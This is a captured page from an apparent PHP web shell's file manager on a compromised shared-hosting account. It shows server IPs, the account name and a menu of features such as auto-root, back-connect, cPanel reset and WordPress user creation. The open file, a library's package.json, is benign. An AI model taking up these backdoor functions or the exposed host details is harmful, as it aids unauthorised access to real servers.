Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
tui-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.babelrc
296
B
-rw-r--r--
.eslintrc.js
1.2
KB
-rw-r--r--
.npmignore
357
B
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
1.51
KB
-rw-r--r--
bower.json
496
B
-rw-r--r--
jsdoc.conf.json
734
B
-rw-r--r--
karma.conf.js
4.42
KB
-rw-r--r--
package.json
2.08
KB
-rw-r--r--
test.html
187
B
-rw-r--r--
webpack.config.js
1.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tui-dom", "version": "3.0.0", "main": "dist/tui-dom.js", "scripts": { "test": "karma start --no-single-run", "test:ne": "KARMA_SERVER=ne karma start", "bundle": "webpack && webpack -p", "serve": "webpack-dev-server --inline --hot -d", "serve:ie8": "webpack-dev-server -d", "cpy-dist2doc": "mkdir -p doc/dist && cp -f -r dist doc", "doc": "jsdoc -c jsdoc.conf.json && npm run cpy-dist2doc" }, "description": "TOAST UI Utility: DOM", "repository": { "type": "git", "url": "https://github.com/nhnent/tui.dom.git" }, "keywords": [ "nhnent", "tui", "Utility", "DOM" ], "author": "NHNEnt FE Development Lab <dl_javascript@nhnent.com>", "license": "MIT", "devDependencies": { "babel-core": "^6.18.2", "babel-loader": "^6.2.7", "babel-plugin-istanbul": "^2.0.3", "babel-plugin-transform-es2015-modules-commonjs": "^6.18.0", "babel-plugin-transform-es3-member-expression-literals": "^6.5.0", "babel-plugin-transform-es3-property-literals": "^6.5.0", "babel-preset-es2015": "^6.18.0", "es5-shim": "^4.5.9", "eslint": "^4.5.0", "eslint-config-tui": "^1.0.1", "eslint-loader": "^1.6.1", "eslint-plugin-babel": "^4.1.2", "extract-text-webpack-plugin": "^1.0.1", "istanbul-instrumenter-loader": "^1.0.0", "jasmine-core": "^2.4.1", "jasmine-jquery": "^2.1.1", "jsdoc": "^3.4.2", "karma": "1.3.0", "karma-chrome-launcher": "^2.0.0", "karma-coverage": "^1.1.1", "karma-edge-launcher": "^0.4.1", "karma-es5-shim": "^0.0.4", "karma-fixture": "^0.2.6", "karma-jasmine": "^1.1.0", "karma-jasmine-jquery": "^0.1.1", "karma-jquery": "^0.2.2", "karma-junit-reporter": "^1.1.0", "karma-sourcemap-loader": "^0.3.7", "karma-webdriver-launcher": "git+https://github.com/nhnent/karma-webdriver-launcher.git#v1.1.0", "karma-webpack": "^2.0.4", "safe-umd-webpack-plugin": "^0.0.1", "tui-jsdoc-template": "^1.2.1", "webpack": "^1.13.3", "webpack-dev-server": "^1.11.0" }, "dependencies": { "tui-code-snippet": "^1.2.5" } }
Close